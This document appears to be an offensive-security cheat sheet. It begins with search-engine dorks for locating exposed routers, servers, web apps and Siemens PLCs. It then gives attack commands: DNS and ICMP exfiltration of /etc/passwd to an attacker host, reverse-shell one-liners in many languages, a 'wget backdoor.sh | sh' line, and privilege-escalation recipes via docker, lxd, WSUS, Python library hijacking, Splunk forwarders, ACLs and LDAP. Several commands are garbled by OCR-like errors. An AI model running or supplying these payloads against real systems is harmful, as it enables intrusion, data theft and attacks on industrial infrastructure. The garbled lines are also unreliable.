http.server.headers.product: “Atlassian-Bamboo”

app:”BambooHR”

http.title:”BambooHR” OR http.title:”Bamboo Login”

title=”BambooHR” OR “Atlassian Bamboo”

title:”BambooHR” OR title:”Atlassian Bamboo”

“https://bamboohr.com/” OR “https://.bamboohr.com/” OR “https://.atlassian.net/bamboo”

D-Link

Server: DWS-3024/DWS-4026

443.https.get.body_sha256: 6db3cb97f7c6b921e6d8f17db874de6c54df6a4d4d8b4caad7724063907c0522

text:D-Link

dlink

title:’D-Link’

webapp=’D-Link’

product: dlink

title=”D-Link” || body=”D-Link”

http.favicon.hash:1572591353

product:D-Link

TPLink

Server: TP-LINK

443.https.get.body: “TP-LINK”

http.html: /tplinklogin.net/

http.user_agent: “TP-LINK” or http.html: “tplinklogin.net”

http.component: “TPLINK”

app:”TP-LINK ROUTER”

http.html: /tplinklogin.net/ or http.html: /tplogin.cn/

title=”TP-LINK” || header=”TP-LINK”

HTTP Headers.server: TP-LINK

title:”TP-LINK”

HP iLO

HP-iLO-Server at / inurl:login.htm

hp ilo” OR “hp integrated lights-out

“HP-iLO-Server” OR “HP-iLO-4-Server” OR “HP-iLO-5-Server”

title:”Integrated Lights-Out” hp” OR “HP Integrated Lights-Out http-title:”

title:”Integrated Lights-Out” hp” OR “HP Integrated Lights-Out http-title:”

app:”HP Integrated Lights-Out”” OR “app:”iLO”

title:”Integrated Lights-Out” hp” OR “HP Integrated Lights-Out http-title:”

header=”HP-iLO-Server”” OR “header=”HP-iLO-4-Server”” OR “header=”HP-iLO-5-Server”

title:”Integrated Lights-Out” hp” OR “HP Integrated Lights-Out http-title:”

product:hp integrated lights-out” OR “title:”Integrated Lights-Out” hp

Adobe Connect

product:Adobe Connect

443.https.get.metadata.server: AdobeConnect

server.headers.server: AdobeConnect

http.html_body: adobeconnect.com

product:Adobe Connect

title: Adobe Connect

443.metadata.server: AdobeConnect

title=Adobe Connect

Adobe Connect

adobeconnect.com

Netgear

netgear

netgear

netgear

netgear

netgear

netgear

netgear

title=NETGEAR

product:NETGEAR

netgear

Nexus

“nexus” http.favicon.hash:1319622454

443.https.get.headers.server: Nexus/*

server:Nexus

http.html.headers.server: Nexus/*

product:nexus

webapp=”Sonatype Nexus Repository Manager”

nexus

title=”Sonatype Nexus Repository Manager” || body=”Nexus Repository Manager” || body=”Nexus Repository”

Nexus

product:Nexus Repository

SaltStack

product:”SaltStack” port:”4505,4506”

443.https.get.body_sha256:7c1dd60d42f7a496d16f584e7a0c2d1a7f904c4b4f54c4bb2cbff1ad78c520cb

app:SaltStack

metadata.product:”SaltStack”

protocols:”smb” AND service.service_name:”smb” AND smb.banner:”SaltStack”

app:”SaltStack”

service.name:salt

app=”SaltStack”

https.html.body:”SaltStack”

app:”SaltStack”

Graylog

“title:Graylog” OR “h1:Graylog”

“title:Graylog” OR “h1:Graylog”

“title:Graylog” OR “h1:Graylog”

“title:Graylog” OR “h1:Graylog”

Graylog

title:Graylog

title:Graylog

title:Graylog

title:Graylog

title:Graylog

Bugzilla

“Bugzilla_login” port:”80, 443”

product:Bugzilla

http.favicon.hash:-431232002

port:80 http.favicon.hash:-431232002

title:”Bugzilla”

title:”Bugzilla”

app:bugzilla

title=Bugzilla

https:///bugzilla/

intext:”Bugzilla_login”

Siemens PLCs

“Siemens PLC” port:102, “Siemens PLC” port:502, “Siemens PLC” port:161, “Siemens PLC” port:2000, “Siemens PLC” port:102/tcp, “Siemens PLC” port:102/udp, “Siemens PLC” port:502/tcp, “Siemens PLC” port:161/tcp, “Siemens PLC” port:2000/tcp

(“Siemens” AND “plc”) AND protocols: “modbus”, “s7”, “bacnet”

“Siemens” “PLC” site:*.com

“Siemens PLC” OR “S7 PLC”

“Siemens PLC” OR “Siemens Simatic” OR “Siemens S7”

“Siemens” “PLC”

“Siemens” “PLC”

title=”Siemens” && title=”PLC”

Siemens PLC”

Siemens PLC”

SolarWinds

“SolarWinds” port: 443, 80, 8443, 17778

p443.http.get.title: “SolarWinds”

solarwinds

metadata.product: “solarwinds”

http.component:SolarWinds

app:”SolarWinds”

solarwinds

title=”SolarWinds” || header=”solarwinds”

solarwinds

solarwinds

Joomla

“joomla” port:80,443,8080

(80.http.get.title:”Joomla!” OR 443.https.get.title:”Joomla!” OR 8080.http.get.title:”Joomla!”) AND protocols:(“80/http” OR “443/https” OR “8080/http”)

http.title:”Joomla!” OR https.title:”Joomla!”

http.html_title:”Joomla!” OR https.html_title:”Joomla!”

“Joomla” protocol:https

“joomla” port:”80, 443, 8080”

title:”Joomla!”

title=”Joomla!” || header=”Joomla!” || body=”Joomla!” || banner=”Joomla!”

“Joomla” && http

app:”Joomla” AND (protocols:80 OR protocols:443 OR protocols:8080)

WordPress

http.component:”wordpress” -http.title:”404” -http.title:”Not Found”

443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names: wordpress

http.html.body:wordpress

http.html.body:/wp-content/

http.component:”WordPress”

app:”WordPress”

http.component==”WordPress”

title=”WordPress” && protocol=”https”

http.favicon.hash: -1412814735

Drupal

http.favicon.hash:-335242539 drupal

443.https.get.body_sha256:*,27a1f1d7df1e0c9f89d0b35c2466e2bbbd8c6ca0ed6b62100d1f98f1c9cfbde7 drupal

http.html_hash:563737271 drupal

metadata.product:drupal

protocols:80.http.get.headers.server:Drupal

app:”Drupal CMS”

HTTP.favicon.hash:-335242539 Drupal

title=”Powered by Drupal” || body=”This site is powered by Drupal” || header=”X-Generator: Drupal”

product:drupal

drupal

Laravel

“laravel” http.component:/laravel/

p.server software:”nginx/1.16.1” && p.http.server_header:”Laravel”

http.html:/”Laravel Framework”/

http.metadata.product:Laravel

http.component:laravel

app:”Laravel Framework”

http.favicon.hash:-318056997

app=”laravel”

http.title:”Laravel”

http.html:/”Laravel Framework”/

Zend Framework

“Server: ZendServer” OR “Set-Cookie: ZDEDebuggerPresent”

p.http.components.name: “Zend Framework”

p:http.component:zend

http.component:zend-framework

http.fingerprint.service: “Zend Server” OR http.html.xpath: “//*[contains(text(),’Zend Framework’)]”

“PHPSESSID” “Zend Framework”

http.fingerprint.component:Zend

title=”Zend Framework”

http.html.body: “Zend Framework”

Symfony

“Server: Symfony” OR “X-Symfony-Version”

443.https.get.title: “Welcome to Symfony””, “80.http.get.title: “Welcome to Symfony””, or “80.http.get.body: “Powered by Symfony”

http.html_body:Symfony

http.server_header:Symfony

http.favicon.hash:3964474325

app:Symfony

Symfony

title=”Welcome to Symfony” || header=”X-Symfony-Version”

Symfony

Symfony

Node.js Express

http.favicon.hash:-335242539 ‘set-cookie: connect.sid’ ‘X-Powered-By: Express’

443.https.get.body_sha256:5npHOpkBQmXv+7M1fYOtFkx7fW8IvSbzzNNQoWXq3G4 AND 443.https.tls.certificate.parsed.subject.common_name:*.nodejitsu.com

http.headers.server:Express AND http.html.body:express

http.favicon.hash:-335242539 AND http.headers.server:Express

http.favicon.hash:-335242539 AND http.headers.server:Express

app: “node.js express”

Roundcube

“roundcube” http.component:”roundcube”

(443.https.tls.certificate.parsed.names: “webmail.yourdomain.com”) AND protocols: [“443/https”] (25.smtp.starttls.tls.certificate.parsed.names: “webmail.yourdomain.com”) AND protocols: [“25/smtp”]

http.html_body: “Roundcube Webmail”

web.server: “roundcube”

roundcube

app:”roundcube”

roundcube

title=”Roundcube Webmail”

Roundcube

http.favicon.hash: “3261056547”

Zimbra

“zimbra” port:7071, “zimbra” port:8443

80.http.get.title:”Zimbra Web Client” OR 80.http.get.title:”Zimbra Login” OR 443.https.get.title:”Zimbra Web Client” OR 443.https.get.title:”Zimbra Login”

html.title:”Zimbra”

zimbra

product:”Zimbra Collaboration Server”

zimbra

zimbra

title=”Zimbra Web Client” || title=”Zimbra Login” || body=”Zimbra Collaboration Server” || header=”zimbra” || header=”Zimbra”

zimbra

zimbra

Manage Engine ServiceDesk

Server: ManageEngine_ServiceDesk

443.https.tls.certificate.parsed.subject.organization:ManageEngine

domain:’servicedesk.*.manageengine.com’

http.favicon.hash:-1360563422

title:’ManageEngine ServiceDesk Plus’

title:’ManageEngine ServiceDesk Plus - Login’

http.html: /ManageEngine/ServiceDeskPlus/

title=”ManageEngine ServiceDesk Plus” || body=”Powered by ServiceDesk Plus” || body=”ManageEngine ServiceDesk Plus” || header=”Server: ManageEngine_ServiceDesk”

title:’ServiceDesk Plus - Log in’

http.title:’ServiceDesk Plus - Log in’ OR body:’ServiceDesk Plus - Log in’ OR http.title:’ServiceDesk Plus - Self Service’ OR body:’ServiceDesk Plus - Self Service’

Delta Electronics InfraSuite

“http.component:InfiniManage” “InfraSuite Device” “Delta Electronics” censys: 443.https.get.headers.server: InfiniManage AND 443.https.tls.certificate.parsed.subject.organization:Delta Electronics Inc

html.body:InfiniManage AND html.title:InfraSuite Device AND html.body:Delta Electronics

html.body:InfiniManage AND html.title:InfraSuite Device AND html.body:Delta Electronics

tag:”infinimanage” AND tag:”device” AND tag:”infrasuite” AND tag:”delta electronics”

html.title:”InfiniManage” AND html.body:”InfraSuite Device” AND html.body:”Delta Electronics”

app:”InfiniManage” AND title:”InfraSuite Device” AND body:”Delta Electronics”

title:”InfraSuite Device” AND body:”Delta Electronics” AND app:”InfiniManage”

title=”InfiniManage” && body=”InfraSuite Device” && body=”Delta Electronics”

title:InfiniManage AND body:InfraSuite Device AND body:”Delta Electronics”

“InfiniManage” AND “InfraSuite Device” AND “Delta Electronics”

PandoraFMS

http.favicon.hash:-335242539 port:80 pandorafms

443.https.tls.certificate.parsed.subject.common_name: pandorafms

pandorafms

port:80 http.component:pandoraFMS

http.favicon.hash:-335242539 pandorafms

title:”Pandora FMS - Login”

pandorafms

title=”Pandora FMS” || body=”Powered by Pandora FMS”

https://app.pandorafms.com/

app:pandorafms

Lexmark printers

“lexmark” “HTTP/1.1 200 OK” “Server: Lexmark”

“lexmark” and 443.https.get.headers.server: Lexmark

metadata.product:lexmark

http.title:”Lexmark”

app:”Lexmark-HttpServer”

service:lexmark

title=”Lexmark”

lexmark

lexmark

Browser Cache

Firefox

𝑐𝑑 /. 𝑚𝑜𝑧𝑖𝑙𝑙𝑎/𝑓𝑖𝑟𝑒𝑓𝑜𝑥/4𝑝𝑧𝑔𝑞𝑔𝑗4. 𝑑𝑒𝑓𝑎𝑢𝑙𝑡 − 𝑟𝑒𝑙𝑒𝑎𝑠e
𝑠𝑞𝑙𝑖𝑡𝑒3 𝑝𝑙𝑎𝑐𝑒𝑠. 𝑠𝑞𝑙𝑖𝑡𝑒
.𝑡𝑎𝑏𝑙𝑒𝑠
𝑠𝑒𝑙𝑒𝑐𝑡 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠. 𝑢𝑟𝑙 𝑓𝑟𝑜𝑚 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠;
. 𝑞𝑢𝑖

File transfer

Transfer by ftp without direct access to shell

echo open ip 21 ftp.txt
echo user ftp.txt
echo pass ftp.txt
echo bin ftp.txt
echo GET file tp.txt
echo bye ftp.txt
ftp -s:ftp.txt

Transfer Dns in Linux

On victim:
1. Hex encode the file to be transferred
    xxd -p secret file.hex
2. Read in each line and do a DNS lookup
    forb in 'cat fole.hex'; do dig $b.shell.evilexample.com; done

Attacker:
1. Capture DNS exfil packets
    tcdpump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet
    tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d'
    cut -f1 -d'.' | uniq received. txt
3. Reverse the hex encoding
    xxd -r -p received~.txt kefS.pgp

Execute the exfil command and transfer its information with icmp

On victim (never ending 1 liner):
     stringz=cat /etc/passwd | od -tx1 | cut -c8- | tr -d " " | tr -d "\n";
counter=0; while (($counter = ${#stringZ})) ;do ping -s 16 -c l -p
${stringZ:$counter:16} 192.168.10.10 &&
counter=$( (counter+~6)) ; done

On attacker (capture pac~ets to data.dmp and parse):
tcpdump -ntvvSxs 0 'icmp[0]=8' data.dmp
grep Ox0020 data.dmp | cut -c21- | tr -d " " | tr -d "\n" | xxd -r -p

Open mail relay

C:\ telnet x.x.x.x 25
Hello x.x.x.x
MAIL FROM: me@you.com
RCPT TO: YOU@YOU.com
DATA
Thank you.
quit

Reverse loose

Netcat command (* run on the attacker’s system)

nc 10.0.0.1 1234 -e /bin/sh Linux reverse shell
nc 10.0.0.1 1234 -e cmd.exe Windows reverse shell

Netcat command (-e may not be supported in some versions)

nc -e /bin/sh 10.0.0.1 1234

Netcat command for when -e is not supported

rm /tmp/f;mkfifo /tmp/f;cat /tmp/fl/bin/sh -i 2 &line l0.0.0.1 1234 /tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.105 9999 >/tmp/f

Perl language

perl -e 'use Socket; $i="10.0.0.l"; $p=1234; socket (S, PF INET, SOCK STREAM,
getprotobjname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN," &S") ;open(STDOUT," &S"); open(STDERR," &S"); exec("/bin/sh" -i");};'

Perl language without /bin/sh

perl -MIO -e '$p=fork;exit,if($p);$c=new
IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN- fdopen($c,r);$~-fdopen($
c, w) ; system$_ while ;'

Perl language for windows

perl -MIO -e '$c=new IO: :Socket: :INET(PeerAddr,''attackerip:4444'') ;STDIN-fdopen($
c,r) ;$~- fdopen($c,w) ;system$_ while ;'

Python language

python -c 'import socket, subprocess, os; s=socket. socket (socket. AF_INET,
socket.SOCK_STREAM); s.connect( ("10.0.0.1",1234)); os.dup2 (s.fileno() ,0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

Or

check sudoer script content like:

#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
You have new mail in /var/mail/waldo

and create file for got root as shutil.py contains:

import os
import pty
import socket

lhost = "10.10.10.10"
lport = 4444

ZIP_DEFLATED = 0

class ZipFile:
   def close(*args):
       return
   def __init__(self, *args):
       return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

and run sudoer script with 

sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6

Bash language

bash -i & /dev/tcp/10.0.0.1/8080 0 &1

Java language

r = Runtime.getRuntime()
p = r.exec( ["/bin/bash","-c","exec 5 /dev/tcp/10.0.0.1/2002;cat &5 |
while read line; do \$line 2 &5 &5; done"] as String[])
p.waitFor()

Php language

php -r '$sock=fsockopen("10.0.0.1", 1234) ;exec("/bin/sh -i &3 &3 2 &3");'

Ruby language

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec
sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'

Ruby language without /bin/sh

by -rsocket -e 'exit if
fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd, " r
") {| io|c.print io.read}end'

Ruby language for windows

ruby -rsocket -e
'c=TCPSocket.new("attackerip","4444");while(crnd=c.gets);IO.popen{cmd,"r" ) {|
io|c.print io.read}end'

Telnet command

rm -f /tmp/p; mknod /tmp/p p && telnet attackerrip 4444 0/tmp/p
--OR--
telnet attacker rip 4444 | /bin/bash | telnet attacker rip 4445

Xterm command

xterm -display 10.0.0.1:1
o Start Listener: Xnest: 1
o Add permission to connect: xhost +victimP

Other

wget hhtp:// server /backdoor.sh -O- | sh Downloads and runs backdoor.sh

spawn shell

python3 -c 'import pty; pty.spawn("/bin/sh")'

or

sudo - I
python -c 'import pty; pty. spawn("/bin/bash”)’
sudo -u webadmin vi
ESC +:+ !/bin/sh
bash - i
whoami
try ctrl + z
stty raw -echo 
fg
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh

netsec.ws

Improve accessibility

Help: https://gtfobins.github.io/

Increasing accessibility with composer

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Increasing access with docker

You must be logged in with an application that is a member of the docker group.

docker run -v /root:/mnt -it ubuntu

Or

docker run --rm -it --privileged nginx bash
mkdir /mnt/fsroot
mount /dev/sda /mnt/fsroot

Increasing access with docker socket


Checking docker exposure

curl -s --unix-socket /var/run/docker.sock http://localhost/images/json

We do the following commands in the script.

cmd="whoami"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds \": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)

revShellContainerID=$(echo "$response" | cut -d'"' -f4)

curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"

Then we run it.

./docket-socket-expose.sh

chroot

chroot /root /bin/bash

Increase access with lxd

in attacker host
1. git clone https://github.com/saghul/lxd-alpine-builder.git
2. ./build-alpine
in victim host
3. Download built image
4. import ./alpine-v3.12-x86_64-20200621_2005.tar.gz --alias attacker
5. lxc init attacker tester -c security.privileged=true
6. lxc exec tester/bin/sh

Increase access with WSUS

SharpWSUS.exe create /payload:"C:\Users\user\Desktop\PsExec64.exe" /args:"-acceptula -s -d cmd.exe /c \"net localgroup administrator user /add\"" /title: title
SharpWSUS.exe approve /updateid:<id> /computername:dc.domain.dev /groupname:"title"

Increase access in journalctl

The journalctl launcher must be run with more privileges such as sudo.

journalctl
!/bin/sh

Or

sudo journalctl
!/bin/sh

Improve access with Splunk Universal Forward Hijacking

python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp /luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'

Increase access with 00-header file

echo "id" >> 00-header

Increase accessibility in nano

Ctrl+R + Ctrl+X
reset; sh 1>&0 2>&0

Or

Ctrl+W
/etc/shadow

Increase access in vi

:!/bin/sh

Increase access by ShadowCredentials method

whisker.exe add /target:user
.\Rubeus.exe askgt /user:user /certificate:<base64-cert> /password:"password" /domain:domain /dc:DC.domain.dev /getcredentials /show

Increase access using acl

$user = "megacorp\jorden"
$folder = "C:\Users\administrator"
$acl = get-acl $folder
$aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow"
$aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions
$acl.AddAccessRule($aclrule)
set-acl -path $folder -AclObject $acl
get-acl $folder | folder

Increase access with ldap


To enable ssh using ldap

0. exec ldapmodify -x -w PASSWORD
1. Paste this
dn: cn=openssh-lpk,cn=schema,cn=config
objectClass: olcSchemaConfig
cn: openssh-lpk
olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
   DESC 'MANDATORY: OpenSSH Public key'
   EQUALITY octetStringMatch
   SYNTAX 1.3.6.1.4.1.1466.115.121.1.40)
olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
   DESC 'MANDATORY: OpenSSH LPK objectclass'
   MAY ( sshPublicKey $ uid )
   )

To improve access to the desired user and user group

2. exec ldapmodify -x -w PASSWORD
3. Paste this
dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: content of id_rsa.pub
-
replace: EVIL GROUP ID
uidNumber: CURRENT USER ID
-